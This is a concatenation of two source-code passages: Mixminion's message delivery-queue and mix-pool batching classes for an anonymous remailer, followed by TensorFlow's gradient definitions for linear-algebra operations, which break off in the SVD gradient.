self.queue = self.message = None
def failed(self, retriable=0, now=None):
"""Mark this message as has having failed delivery, either rescheduling
it or removing it from the queue."""
self.queue.deliveryFailed(self.handle, retriable, now=now)
self.queue = self.message = None
def getMessage(self):
"""Return the underlying object stored in the delivery queue, loading
it from disk if necessary. May raise CorruptedFile."""
assert self.handle is not None
if self.message is None:
self.message = self.queue.store.getObject(self.handle)
return self.message
class DeliveryQueue:
"""A DeliveryQueue implements a queue that greedily sends messages to
outgoing streams that occasionally fail. All underlying messages
are pickled objects. Additionally, we store metadata about
attempted deliveries in the past, so we know when to schedule the
next delivery.
This class is abstract. Implementors of this class should subclass
it to add a _deliverMessages method. Multiple invocations of this
method may be active at a given time. Upon success or failure, this
method should cause deliverySucceeded or deliveryFailed to be called
as appropriate.
Users of this class will probably only want to call the
queueDeliveryMessage, sendReadyMessages, and nextMessageReadyAt
methods.
This class caches information about the directory state; it won't
play nice if multiple instances are looking at the same directory.
"""
###
# Fields:
# store -- An ObjectMetadataStore to back this queue. The objects
# are instances of whatever deliverable object this queue contains;
# the metadata are instances of _DeliveryState.
# retrySchedule -- a list of intervals at which delivery of messages
# should be reattempted, as described in "setRetrySchedule".
# _lock -- a reference to the RLock used to control access to the
# store.
def __init__(self, location, retrySchedule=None, now=None, name=None):
"""Create a new DeliveryQueue object that stores its files in
<location>. If retrySchedule is provided, it is interpreted as
in setRetrySchedule. Name, if present, is a human-readable
name used in log messages."""
self.store = mixminion.Filestore.ObjectMetadataStore(
location,create=1,scrub=1)
self._lock = self.store._lock
if name is None:
self.qname = os.path.split(location)[1]
else:
self.qname = name
self.retrySchedule = None
self._rescan()
if retrySchedule is not None:
self.setRetrySchedule(retrySchedule, now)
else:
self.setRetrySchedule([0], now)
self._repOK()
def setRetrySchedule(self, schedule, now=None):
"""Set the retry schedule for this queue. A retry schedule is
a list of integers, each representing a number of seconds.
For example, a schedule of [ 120, 120, 3600, 3600 ] will
cause undeliverable messages to be retried after 2 minutes,
then 2 minutes later, then 1 hour later, then 1 hour later.
Retry schedules are not strictly guaranteed, for two reasons:
1) Message delivery can fail _unretriably_, in which case
no further attempts are made.
2) Retries are only actually attempted when sendReadyMessages
is called. If the schedule specifies retry attempts at
10-second intervals, but sendReadyMessages is invoked only
every 30 minutes, messages will only me retried once every
30 minutes.
"""
try:
self._lock.acquire()
self.retrySchedule = schedule[:]
self._rebuildNextAttempt(now)
finally:
self._lock.release()
def _rescan(self, now=None):
"""Helper: Rebuild the internal state of this queue from the
underlying directory. After calling 'rescan',
_rebuildNextAttempt must be called to recalculate our
delivery schedule."""
try:
self._lock.acquire()
self.store.loadAllMetadata(lambda h: _DeliveryState())
self._rebuildNextAttempt(now)
self._repOK()
finally:
self._lock.release()
def getAllMessages(self):
"""Return handles for all messages in the store."""
return self.store.getAllMessages()
def count(self):
"""Return the number of messages in the store."""
return self.store.count()
def _rebuildNextAttempt(self, now=None):
"""Helper: Reconstruct self.nextAttempt from self.retrySchedule and
self.deliveryState. DOCDOC
Callers must hold self._lock.
"""
if self.retrySchedule is None:
rs = [0]
else:
rs = self.retrySchedule
for ds in self.store._metadata_cache.values():
ds.setNextAttempt(rs, now)
self._repOK()
def _repOK(self):
"""Raise an assertion error if the internal state of this object is
nonsensical."""
# XXXX Later in the release cycle, we should call this *even* less.
# XXXX It adds ~8-9ms on my laptop for ~400 messages
try:
self._lock.acquire()
allHandles = self.store.getAllMessages()
allHandles.sort()
dsHandles = self.store._metadata_cache.keys()
dsHandles.sort()
assert allHandles == dsHandles
finally:
self._lock.release()
def queueDeliveryMessage(self, msg, address=None, now=None):
"""Schedule a message for delivery.
msg -- the message. This can be any pickleable object.
"""
assert self.retrySchedule is not None
try:
self._lock.acquire()
ds = _DeliveryState(now,None,address)
ds.setNextAttempt(self.retrySchedule, now)
handle = self.store.queueObjectAndMetadata(msg, ds)
log.trace("DeliveryQueue got message %s for %s",
handle, self.qname)
finally:
self._lock.release()
return handle
def _inspect(self,handle):
"""Returns a (msg, inserted, lastAttempt, nextAttempt) tuple
for a given message handle. For testing. """
self._repOK()
o = self.store.getObject(handle)
ds = self.store.getMetadata(handle)
return (o, ds.queuedTime, ds.lastAttempt, ds.nextAttempt)
def removeExpiredMessages(self, now=None):
"""Remove every message expired in this queue according to the
current schedule. Ordinarily, messages are removed when
their last delivery is over. Occasionally, however,
changing the schedule while the system is down can make calling
this method useful."""
try:
self._lock.acquire()
#XXXX
for h, ds in self.store._metadata_cache.items():
if ds.isRemovable():
self.removeMessage(h)
finally:
self._lock.release()
def sendReadyMessages(self, now=None):
"""Sends all messages which are not already being sent, and which
are scheduled to be sent."""
assert self.retrySchedule is not None
self._repOK()
if now is None:
now = time.time()
log.trace("DeliveryQueue checking for deliverable messages in %s",
self.qname)
try:
self._lock.acquire()
messages = []
for h in self.store._metadata_cache.keys():
try:
state = self.store.getMetadata(h)
except CorruptedFile:
continue
if state.isPending():
#log.trace(" [%s] is pending delivery", h)
continue
elif state.isRemovable():
#log.trace(" [%s] is expired", h)
self.removeMessage(h)
elif state.nextAttempt <= now:
#log.trace(" [%s] is ready for delivery", h)
if state is None:
addr = None
else:
addr = state.address
messages.append(PendingMessage(h,self,addr))
state.setPending(now)
else:
#log.trace(" [%s] is not yet ready for redelivery", h)
continue
finally:
self._lock.release()
self._deliverMessages(messages)
self._repOK()
def _deliverMessages(self, msgList):
"""Abstract method; Invoked with a list of PendingMessage objects
every time we have a batch of messages to send.
For every PendingMessage object on the list, the object's
.succeeded() or .failed() method should eventually be called, or
the message will sit in the queue indefinitely, without being
retried."""
# We could implement this as a single _deliverMessage(h,addr)
# method, but that wouldn't allow implementations to batch
# messages being sent to the same address.
raise NotImplementedError("_deliverMessages")
def removeMessage(self, handle):
self.store.removeMessage(handle)
def cleanQueue(self, secureDeleteFn=None):
self.store.cleanQueue(secureDeleteFn)
def removeAll(self, secureDeleteFn=None):
try:
self._lock.acquire()
self.store.removeAll(secureDeleteFn)
self.cleanQueue()
finally:
self._lock.release()
def deliverySucceeded(self, handle, now=None):
"""Removes a message from the outgoing queue. This method
should be invoked after the corresponding message has been
successfully delivered.
"""
assert self.retrySchedule is not None
log.trace("DeliveryQueue got successful delivery for %s from %s",
handle, self.qname)
self.removeMessage(handle)
def deliveryFailed(self, handle, retriable=0, now=None):
"""Removes a message from the outgoing queue, or requeues it
for delivery at a later time. This method should be
invoked after the corresponding message has been
unsuccessfully delivered."""
assert self.retrySchedule is not None
log.trace("DeliveryQueue failed to deliver %s from %s",
handle, self.qname)
try:
self._lock.acquire()
try:
ds = self.store.getMetadata(handle)
except KeyError:
ds = None
except CorruptedFile:
return
if ds is None:
# This should never happen
log.exception("Handle %s had no state", handle)
ds = _DeliveryState(now)
ds.setNextAttempt(self.retrySchedule, now)
self.store.setMetadata(handle, ds)
return
if not ds.isPending():
log.error("Handle %s was not pending", handle)
return
last = ds.pending
ds.setNonPending()
if retriable:
# If we can retry the message, update the deliveryState
# with the most recent attempt, and see if there's another
# attempt in the future.
ds.setLastAttempt(last)
ds.setNextAttempt(self.retrySchedule, now)
if ds.nextAttempt is not None:
# There is another scheduled delivery attempt. Remember
# it, mark the message sendable again, and save our state.
log.trace(" (We'll try %s again at %s)", handle,
formatTime(ds.nextAttempt, 1))
self.store.setMetadata(handle, ds)
return
else:
assert ds.isRemovable()
# Otherwise, fallthrough.
# If we reach this point, the message is undeliverable, either
# because 'retriable' is false, or because we've run out of
# retries.
log.trace(" (Giving up on %s)", handle)
self.removeMessage(handle)
finally:
self._lock.release()
class _AddressState:
"""DOCDOsC"""
def __init__(self, address):
self.address = address
self.lastSuccess = self.lastFailure = self.firstFailure = None
def __getstate__(self):
return ("ADDR-V1", self.address, self.lastSuccess,
self.lastFailure, self.firstFailure)
def __setstate__(self, state):
if state[0] == 'ADDR-V1':
_, self.address, self.lastSuccess, self.lastFailure, \
self.firstFailure = state
else:
#XXXX008 This is way too extreme.
raise MixFatalError("Unrecognized delivery state")
self.nextAttempt = None
def setNextAttempt(self, retrySchedule, now=None):
if not now:
now = time.time()
self.nextAttempt = _calculateNext(self.lastFailure,
self.firstFailure,
retrySchedule, canDrop=0, now=now)
def getLastActivity(self):
events = [ e for e in [self.lastSuccess, self.lastFailure]
if e is not None ]
if events:
return max(events)
else:
return None
def succeeded(self, now=None):
if not now:
now = time.time()
self.lastSuccess = now
self.lastFailure = None
self.firstFailure = None
def failed(self, attempt, now=None):
if not now:
now = time.time()
if not self.firstFailure:
self.firstFailure = attempt
self.lastFailure = attempt
class PerAddressDeliveryQueue(DeliveryQueue):
"""Implementats the same interface as DeliveryQueue, but retries
messages on a per-address basis rather than a per-message
basis. That is, if any message to the address X fails, we wait
for the first retry interval before retrying _any_ messages fo
address X; and when address X succeeds again, we retry _all_
messages to X.
"""
# This turns out to have important anonymity implications: Suppose
# that we retry messages independently, and that our retry policy
# is 'every 1 hour for 1 day, every 12 hours for 1 week'. Suppose
# that the server B is down. The following sequence of events
# could occur:
#
# 1. At Hour 0, we receive message M1, and soon try to
# deliver it to B; it fails, we hold it in the queue. We
# retry M1 every hour for 24 hours.
#
# 2. At Hour 30, B comes back up again.
#
# 3. At Hour 32, we receive message M2, and soon try to
# deliver it. The delivery succeeds.
#
# 4. At Hour 36, we reattempt message M1 and succeed.
#
# An observer who is watching us can tell that the message which
# we delivered to B in step 3 could not have been the same message
# as we attempted to deliver in step 1. Furthermore, such an
# oberver can deduce that the message we attempted to deliver in
# step 1 was successfully delivered in step 4. This information
# could be helpful to traffic analysis.
#
# With the algorithm implemented in this class, the address B
# would be retried at Hour 36, and both messages M1 and M2 would
# be delivered at the same time. The adversary knows that at
# least one of M1 and M2 has been waiting around since hour 0, but
# does not know which of them (if either!) arrived later.
#
# We use this algorithm for packet delivery. With email, on the
# other hand, we just pass messages to our MTA and let it cope
# correctly: most (all?) MTAs use a retry algorithm equivalent to
# this one.
# DOCDOC
def __init__(self, location, retrySchedule=None, now=None, name=None):
self.addressStateDB = mixminion.Filestore.WritethroughDict(
filename=os.path.join(location,"addressStatus.db"),
purpose="address state")
if retrySchedule is None:
retrySchedule = [3600]
DeliveryQueue.__init__(self, location=location,
retrySchedule=retrySchedule, now=now, name=name)
def sync(self):
self._lock.acquire()
try:
self.addressStateDB.sync()
finally:
self._lock.release()
def _rescan(self):
try:
self._lock.acquire()
DeliveryQueue._rescan(self)
finally:
self._lock.release()
def _rebuildNextAttempt(self, now=None):
self._lock.acquire()
try:
for ds in self.store._metadata_cache.values():
if not self.addressStateDB.has_key(str(ds.address)):
as_ = _AddressState(ds.address)
self.addressStateDB[str(ds.address)] = as_
if not self.retrySchedule:
rs = [3600]
self.totalLifetime = 3600
else:
rs = self.retrySchedule
self.totalLifetime = reduce(operator.add,self.retrySchedule,0)
for addr_state in self.addressStateDB.values():
addr_state.setNextAttempt(rs, now)
self._repOK()
finally:
self._lock.release()
def removeExpiredMessages(self, now=None):
"""DOCDOC"""
assert self.retrySchedule is not None
self._lock.acquire()
try:
have = {}
for h, ds in self.store._metadata_cache.items():
if ds.queuedTime + self.totalLifetime < now:
self.removeMessage(h)
else:
have[ds.address]=1
for k, addr_state in self.addressStateDB.items():
if have.has_key(addr_state.address):
continue
lastActivity = addr_state.getLastActivity()
if lastActivity and (
lastActivity + self.totalLifetime < now):
del self.addressStateDB[k]
finally:
self._lock.release()
def _getAddressState(self, address, now=None):
try:
addr_state = self.addressStateDB[str(address)]
except KeyError:
addr_state = self.addressStateDB[str(address)] = _AddressState(address)
addr_state.setNextAttempt(self.retrySchedule, now)
return addr_state
def queueDeliveryMessage(self, msg, address, now=None):
self._getAddressState(address, now=now)
return DeliveryQueue.queueDeliveryMessage(self,msg,address,now)
def sendReadyMessages(self, now=None):
if now is None:
now = time.time()
self._lock.acquire()
try:
messages = []
for h in self.store._metadata_cache.keys():
try:
state = self.store.getMetadata(h)
except CorruptedFile:
continue
if state.isPending():
#log.trace(" [%s] is pending delivery", h)
continue
elif state.queuedTime + self.totalLifetime < now:
#log.trace(" [%s] is expired", h)
self.removeMessage(h)
continue
addressState = self._getAddressState(state.address, now)
if addressState.nextAttempt <= now:
#log.trace(" [%s] is ready for next attempt on %s", h,
# state.address)
messages.append(PendingMessage(h,self,state.address))
state.setPending(now)
else:
#log.trace(" [%s] will wait for next attempt on %s",h,
# state.address)
continue
finally:
self._lock.release()
self._deliverMessages(messages)
def cleanQueue(self, secureDeleteFn=None):
self.sync()
self.store.cleanQueue(secureDeleteFn)
def close(self):
self.addressStateDB.close()
def deliverySucceeded(self, handle, now=None):
assert self.retrySchedule is not None
self._lock.acquire()
try:
log.trace("PerAddressDeliveryQueue got successful delivery for %s from %s",
handle, self.qname)
try:
mState = self.store.getMetadata(handle)
except CorruptedFile:
mState = None
if mState:
aState = self._getAddressState(mState.address, now)
aState.succeeded(now=now)
aState.setNextAttempt(self.retrySchedule, now)
self.addressStateDB[str(mState.address)] = aState
self.removeMessage(handle)
finally:
self._lock.release()
def deliveryFailed(self, handle, retriable=0, now=None):
assert self.retrySchedule is not None
if now is None:
now = time.time()
self._lock.acquire()
try:
try:
mState = self.store.getMetadata(handle)
except KeyError:
mState = None
except CorruptedFile:
mState = None
if mState is None:
# This should never happen
log.exception("Handle %s had no state; removing", handle)
self.removeMessage(handle)
return
elif not mState.isPending():
log.error("Handle %s was not pending", handle)
return
last = mState.pending
mState.setNonPending()
if not retriable:
log.trace(" (Giving up on %s)", handle)
self.removeMessage(handle)
aState = self._getAddressState(mState.address, now)
aState.failed(attempt=last,now=now)
aState.setNextAttempt(self.retrySchedule,now=now)
self.addressStateDB[str(aState.address)] = aState # flush to db.
finally:
self._lock.release()
def _inspect(self,handle):
"""Returns a (msg, state, addressState) tuple for a given
message handle. For testing."""
self._repOK()
o = self.store.getObject(handle)
ds = self.store.getMetadata(handle)
addr_state = self._getAddressState(ds.address)
return (o, ds, addr_state)
def _repOK(self):
"""Raise an assertion error if the internal state of this object is
nonsensical."""
# XXXX Later in the release cycle, we should call this *even* less.
# XXXX It adds ~8-9ms on my laptop for ~400 messages
self._lock.acquire()
try:
DeliveryQueue._repOK(self)
for h in self.store._metadata_cache.keys():
ds = self.store._metadata_cache[h]
addr_state = self._getAddressState(ds.address)
assert addr_state.address == ds.address
finally:
self._lock.release()
class TimedMixPool(mixminion.Filestore.ObjectStore):
"""A TimedMixPool holds a group of files, and returns some of them
as requested, according to a mixing algorithm that sends a batch
of messages every N seconds."""
## Fields:
# interval: scanning interval, in seconds.
def __init__(self, location, interval=600):
"""Create a TimedMixPool that sends its entire batch of messages
every 'interval' seconds."""
mixminion.Filestore.ObjectStore.__init__(
self, location, create=1, scrub=1)
self.interval = interval
def getBatch(self):
"""Return handles for all messages that the pool is currently ready
to send in the next batch"""
return self.pickRandom()
def getInterval(self):
return self.interval
class CottrellMixPool(TimedMixPool):
"""A CottrellMixPool holds a group of files, and returns some of them
as requested, according the Cottrell (timed dynamic-pool) mixing
algorithm from Mixmaster."""
## Fields:
# interval: scanning interval, in seconds.
# minPool: Minimum number of messages to keep in pool.
# minSend: Minimum number of messages above minPool before we consider
# sending.
# sendRate: Largest fraction of the pool to send at a time.
def __init__(self, location, interval=600, minPool=6, minSend=1,
sendRate=.7):
"""Create a new queue that yields a batch of message every 'interval'
seconds, always keeps <minPool> messages in the pool, never sends
unless it has <minPool>+<minSend> messages, and never sends more
than <sendRate> * the current pool size.
If 'minSend'==1, this is a real Cottrell (type II style) mix pool.
Otherwise, this is a generic 'timed dynamic-pool' mix pool. (Note
that there is still a matter of some controversy whether it ever
makes sense to set minSend != 1.)
"""
# Note that there was a bit of confusion here: earlier versions
# implemented an algorithm called "mixmaster" that wasn't actually the
# mixmaster algorithm. I picked up the other algorithm from an early
# draft of Roger, Paul, and Andrei's 'Batching Taxonomy' paper (since
# corrected); they seem to have gotten it from Anja Jerichow's
# Phd. thesis ("Generalization and Security Improvement of
# Mix-mediated Anonymous Communication") of 2000.
#
# *THIS* is the algorithm that the current 'Batching Taxonomy' paper
# says that Cottrell says is the real thing.
TimedMixPool.__init__(self, location, interval)
self.minPool = minPool
self.minSend = minSend
self.sendRate = sendRate
def _getBatchSize(self):
"Helper method: returns the number of messages to send."
pool = self.count()
if pool >= (self.minPool + self.minSend):
sendable = pool - self.minPool
return min(sendable, max(1, int(pool * self.sendRate)))
else:
return 0
def getBatch(self):
"Returns a list of handles for the next batch of messages to send."
n = self._getBatchSize()
if n:
return self.pickRandom(n)
else:
return []
class _BinomialMixin:
"""Mixin class. Given a MixPool that defines a _getBatchSize function,
replaces the getBatch function with one that -- instead of sending N
messages from a pool of size P, sends each message with probability
N/P."""
def getBatch(self):
n = self._getBatchSize()
count = self.count()
if n == 0 or count == 0:
return []
msgProbability = n / float(count)
rng = getCommonPRNG()
return rng.shuffle([ h for h in self.getAllMessages()
if rng.getFloat() < msgProbability ])
class _BinomialMixin:
"""Mixin class. Given a MixPool that defines a _getBatchSize function,
replaces the getBatch function with one that -- instead of sending N
messages from a pool of size P, sends each message with probability
N/P. (Alternatively, the MixPool can define a _getFraction function,
in which case we'll send messages with probabilty _getFraction().)"""
def _getFraction(self):
n = self._getBatchSize()
count = self.count()
if n == 0 or count == 0:
return 0.0
return n / float(count)
def getBatch(self):
msgProbability = self._getFraction()
rng = getCommonPRNG()
return rng.shuffle([ h for h in self.getAllMessages()
if rng.getFloat() < msgProbability ])
class BinomialCottrellMixPool(_BinomialMixin,CottrellMixPool):
"""Same algorithm as CottrellMixPool, but instead of sending N messages
from the pool of size P, sends each message with probability N/P."""
if 0:
class BinomialPlusMixPool(_BinomialMixin,CottrellMixPool):
"""As presented in Serjantov, PET 2007, 'A Fresh Look at the
Generalized Mix Framework.' (Testing only.)"""
constant_K = 0.01
def _getFraction(self):
""" g(M) = 1 - \frac{(M-n)e^{-kM}+n}{M} """
M = self.count()
n = self.minPool
return 1 - ( (M - n)*math.exp(-self.constant_K * M) + n )/float(M)
class LogGeneralMixPool(_BinomialMixin, TimedMixPool):
"""As presented in Serjantov, PET 2007, 'A Fresh Look at the
Generalized Mix Framework.' (Testing only. Not necessarily
optimal.)"""
def _getFraction(self):
M = self.count()
return 1 - math.log(M)/float(M)
class SqrtGeneralMixPool(_BinomialMixin, TimedMixPool):
"""As presented in Serjantov, PET 2007, 'A Fresh Look at the
Generalized Mix Framework.' (Testing only. Not necessarily
optimal.)"""
def _getFraction(self):
M = self.count()
return 1 - math.sqrt(M)/float(M)
|
lakshayg/tensorflow
|
refs/heads/master
|
tensorflow/python/ops/linalg_grad.py
|
6
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradients for operators defined in linalg_ops.py.
Useful reference for derivative formulas is
An extended collection of matrix derivative results for forward and reverse
mode algorithmic differentiation by Mike Giles:
http://eprints.maths.ox.ac.uk/1079/1/NA-08-01.pdf
A detailed derivation of formulas for backpropagating through spectral layers
(SVD and Eig) by Ionescu, Vantzos & Sminchisescu:
https://arxiv.org/pdf/1509.07838v4.pdf
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.linalg import linalg_impl as _linalg
@ops.RegisterGradient("MatrixInverse")
def _MatrixInverseGrad(op, grad):
"""Gradient for MatrixInverse."""
ainv = op.outputs[0]
return -math_ops.matmul(
ainv, math_ops.matmul(grad, ainv, adjoint_b=True), adjoint_a=True)
@ops.RegisterGradient("MatrixDeterminant")
def _MatrixDeterminantGrad(op, grad):
"""Gradient for MatrixDeterminant."""
a = op.inputs[0]
c = op.outputs[0]
a_adj_inv = linalg_ops.matrix_inverse(a, adjoint=True)
multipliers = array_ops.reshape(grad * c,
array_ops.concat([array_ops.shape(c), [1, 1]],
0))
return multipliers * a_adj_inv
@ops.RegisterGradient("Cholesky")
def _CholeskyGrad(op, grad):
"""Gradient for Cholesky."""
# Gradient is l^{-H} @ ((l^{H} @ grad) * (tril(ones)-1/2*eye)) @ l^{-1}
l = op.outputs[0]
num_rows = array_ops.shape(l)[-1]
batch_shape = array_ops.shape(l)[:-2]
l_inverse = linalg_ops.matrix_triangular_solve(l,
linalg_ops.eye(
num_rows,
batch_shape=batch_shape,
dtype=l.dtype))
middle = math_ops.matmul(l, grad, adjoint_a=True)
middle = array_ops.matrix_set_diag(middle,
0.5 * array_ops.matrix_diag_part(middle))
middle = array_ops.matrix_band_part(middle, -1, 0)
grad_a = math_ops.matmul(
math_ops.matmul(l_inverse, middle, adjoint_a=True), l_inverse)
grad_a += _linalg.adjoint(grad_a)
return grad_a * 0.5
@ops.RegisterGradient("Qr")
def _QrGrad(op, dq, dr):
"""Gradient for Qr."""
q, r = op.outputs
if q.dtype.is_complex:
raise NotImplementedError("QrGrad not implemented for dtype: %s" % q.dtype)
if (r.shape.ndims is None or r.shape.as_list()[-2] is None or
r.shape.as_list()[-1] is None):
raise NotImplementedError("QrGrad not implemented with dynamic shapes.")
if r.shape[-2].value != r.shape[-1].value:
raise NotImplementedError("QrGrad not implemented when ncols > nrows "
"or full_matrices is true and ncols != nrows.")
qdq = math_ops.matmul(q, dq, adjoint_a=True)
qdq_ = qdq - _linalg.adjoint(qdq)
rdr = math_ops.matmul(r, dr, adjoint_b=True)
rdr_ = rdr - _linalg.adjoint(rdr)
tril = array_ops.matrix_band_part(qdq_ + rdr_, -1, 0)
def _TriangularSolve(x, r):
"""Equiv to matmul(x, adjoint(matrix_inverse(r))) if r is upper-tri."""
return _linalg.adjoint(
linalg_ops.matrix_triangular_solve(
r, _linalg.adjoint(x), lower=False, adjoint=False))
grad_a = math_ops.matmul(q, dr + _TriangularSolve(tril, r))
grad_b = _TriangularSolve(dq - math_ops.matmul(q, qdq), r)
return grad_a + grad_b
@ops.RegisterGradient("MatrixSolve")
def _MatrixSolveGrad(op, grad):
"""Gradient for MatrixSolve."""
a = op.inputs[0]
adjoint_a = op.get_attr("adjoint")
c = op.outputs[0]
grad_b = linalg_ops.matrix_solve(a, grad, adjoint=not adjoint_a)
if adjoint_a:
grad_a = -math_ops.matmul(c, grad_b, adjoint_b=True)
else:
grad_a = -math_ops.matmul(grad_b, c, adjoint_b=True)
return (grad_a, grad_b)
@ops.RegisterGradient("MatrixSolveLs")
def _MatrixSolveLsGrad(op, grad):
"""Gradients for MatrixSolveLs."""
# TODO(rmlarsen): The implementation could be more efficient:
# a) Output the Cholesky factorization from forward op instead of
# recomputing it here.
# b) Implement a symmetric rank-k update op instead of computing
# x*z + transpose(x*z). This pattern occurs other places in TensorFlow.
def _Overdetermined(op, grad):
"""Gradients for the overdetermined case of MatrixSolveLs.
This is the backprop for the solution to the normal equations of the first
kind:
X = F(A, B) = (A^T * A + lambda * I)^{-1} * A^T * B
which solve the least squares problem
min ||A * X - B||_F^2 + lambda ||X||_F^2.
"""
a = op.inputs[0]
b = op.inputs[1]
x = op.outputs[0]
l2_regularizer = math_ops.cast(op.inputs[2], a.dtype.base_dtype)
# pylint: disable=protected-access
chol = linalg_ops._RegularizedGramianCholesky(
a, l2_regularizer=l2_regularizer, first_kind=True)
# pylint: enable=protected-access
# Temporary z = (A^T * A + lambda * I)^{-1} * grad.
z = linalg_ops.cholesky_solve(chol, grad)
xzt = math_ops.matmul(x, z, adjoint_b=True)
zx_sym = xzt + array_ops.matrix_transpose(xzt)
grad_a = -math_ops.matmul(a, zx_sym) + math_ops.matmul(b, z, adjoint_b=True)
grad_b = math_ops.matmul(a, z)
return (grad_a, grad_b, None)
def _Underdetermined(op, grad):
"""Gradients for the underdetermined case of MatrixSolveLs.
This is the backprop for the solution to the normal equations of the second
kind:
X = F(A, B) = A * (A*A^T + lambda*I)^{-1} * B
that (for lambda=0) solve the least squares problem
min ||X||_F subject to A*X = B.
"""
a = op.inputs[0]
b = op.inputs[1]
l2_regularizer = math_ops.cast(op.inputs[2], a.dtype.base_dtype)
# pylint: disable=protected-access
chol = linalg_ops._RegularizedGramianCholesky(
a, l2_regularizer=l2_regularizer, first_kind=False)
# pylint: enable=protected-access
grad_b = linalg_ops.cholesky_solve(chol, math_ops.matmul(a, grad))
# Temporary tmp = (A * A^T + lambda * I)^{-1} * B.
tmp = linalg_ops.cholesky_solve(chol, b)
a1 = math_ops.matmul(tmp, a, adjoint_a=True)
a1 = -math_ops.matmul(grad_b, a1)
a2 = grad - math_ops.matmul(a, grad_b, adjoint_a=True)
a2 = math_ops.matmul(tmp, a2, adjoint_b=True)
grad_a = a1 + a2
return (grad_a, grad_b, None)
fast = op.get_attr("fast")
if fast is False:
raise ValueError("Gradient not defined for fast=False")
matrix_shape = op.inputs[0].get_shape()[-2:]
if matrix_shape.is_fully_defined():
if matrix_shape[-2] >= matrix_shape[-1]:
return _Overdetermined(op, grad)
else:
return _Underdetermined(op, grad)
else:
# We have to defer determining the shape to runtime and use
# conditional execution of the appropriate graph.
matrix_shape = array_ops.shape(op.inputs[0])[-2:]
return control_flow_ops.cond(matrix_shape[-2] >= matrix_shape[-1],
lambda: _Overdetermined(op, grad),
lambda: _Underdetermined(op, grad))
@ops.RegisterGradient("MatrixTriangularSolve")
def _MatrixTriangularSolveGrad(op, grad):
"""Gradient for MatrixTriangularSolve."""
a = op.inputs[0]
adjoint_a = op.get_attr("adjoint")
lower_a = op.get_attr("lower")
c = op.outputs[0]
grad_b = linalg_ops.matrix_triangular_solve(
a, grad, lower=lower_a, adjoint=not adjoint_a)
if adjoint_a:
grad_a = -math_ops.matmul(c, grad_b, adjoint_b=True)
else:
grad_a = -math_ops.matmul(grad_b, c, adjoint_b=True)
if lower_a:
grad_a = array_ops.matrix_band_part(grad_a, -1, 0)
else:
grad_a = array_ops.matrix_band_part(grad_a, 0, -1)
return (grad_a, grad_b)
@ops.RegisterGradient("SelfAdjointEigV2")
def _SelfAdjointEigV2Grad(op, grad_e, grad_v):
"""Gradient for SelfAdjointEigV2."""
e = op.outputs[0]
compute_v = op.get_attr("compute_v")
# a = op.inputs[0], which satisfies
# a[...,:,:] * v[...,:,i] = e[...,i] * v[...,i]
with ops.control_dependencies([grad_e, grad_v]):
if compute_v:
v = op.outputs[1]
# Construct the matrix f(i,j) = (i != j ? 1 / (e_i - e_j) : 0).
# Notice that because of the term involving f, the gradient becomes
# infinite (or NaN in practice) when eigenvalues are not unique.
# Mathematically this should not be surprising, since for (k-fold)
# degenerate eigenvalues, the corresponding eigenvectors are only defined
# up to arbitrary rotation in a (k-dimensional) subspace.
f = array_ops.matrix_set_diag(
math_ops.reciprocal(
array_ops.expand_dims(e, -2) - array_ops.expand_dims(e, -1)),
array_ops.zeros_like(e))
grad_a = math_ops.matmul(
v,
math_ops.matmul(
array_ops.matrix_diag(grad_e) +
f * math_ops.matmul(v, grad_v, adjoint_a=True),
v,
adjoint_b=True))
else:
_, v = linalg_ops.self_adjoint_eig(op.inputs[0])
grad_a = math_ops.matmul(v,
math_ops.matmul(
array_ops.matrix_diag(grad_e),
v,
adjoint_b=True))
# The forward op only depends on the lower triangular part of a, so here we
# symmetrize and take the lower triangle
grad_a = array_ops.matrix_band_part(grad_a + _linalg.adjoint(grad_a), -1, 0)
grad_a = array_ops.matrix_set_diag(grad_a,
0.5 * array_ops.matrix_diag_part(grad_a))
return grad_a
@ops.RegisterGradient("Svd")
def _SvdGrad(op, grad_s, grad_u, grad_v):
"""Gradient for the singular value decomposition."""
# The derivation for the compute_uv=False case, and most of
# the derivation for the full_matrices=True case, are in
# Giles' paper (see reference at top of file). A derivation for
# the full_matrices=False case is available at
# https://j-towns.github.io/papers/svd-derivative.pdf
a = op.inputs[0]
a_shape = a.get_shape().with_rank_at_least(2)
if op.get_attr("compute_uv"):
# TODO(rmlarsen): Make this work with complex types.
if a.dtype.is_complex:
raise NotImplementedError(
"SVD gradient is not implemented for complex types and "
"compute_uv=True.")
grad_u_shape = grad_u.get_shape().with_rank_at_least(2)
grad_v_shape = grad_v.get_shape().with_rank_at_least(2)
m = a_shape[-2].merge_with(grad_u_shape[-2])
n = a_shape[-1].merge_with(grad_v_shape[-2])
batch_shape = a_shape[:-2].merge_with(grad_u_shape[:-2]).merge_with(
grad_v_shape[:-2])
a_shape = batch_shape.concatenate([m, n])
m = a_shape[-2].value
n = a_shape[-1].value
# TODO(rmlarsen): Make this work with placeholders.
if m is None or n is None:
raise NotImplementedError(
"SVD gradient has not been implemented for input with unknown "
"inner matrix shape.")
if not op.get_attr("compute_uv"):
s, u, v = linalg_ops.svd(a, compute_uv=True, full_matrices=True)
else:
s = op.outputs[0]
u = op.outputs[1]
v = op.outputs[2]
use_adjoint = False
if m > n:
# Compute the gradient for A^H = V * S^T * U^H, and (implicitly) take the
# Hermitian transpose of the gradient at the end.
use_adjoint = True
m, n = n, m
u, v = v, u
grad_u, grad_v = grad_v, grad_u
with ops.control_dependencies([grad_s, grad_u, grad_v]):
grad_s_mat = array_ops.matrix_diag(grad_s)
if not op.get_attr("compute_uv"):
if use_adjoint:
grad_a = math_ops.matmul(
v[..., :, :m], math_ops.matmul(u, grad_s_mat), adjoint_b=True)
else:
grad_a = math_ops.matmul(u,
math_ops.matmul(
grad_s_mat, v[..., :, :m], adjoint_b=True))
grad_a.set_shape(a_shape)
return grad_a
if op.get_attr("full_matrices") and abs(m - n) > 1:
raise NotImplementedError(
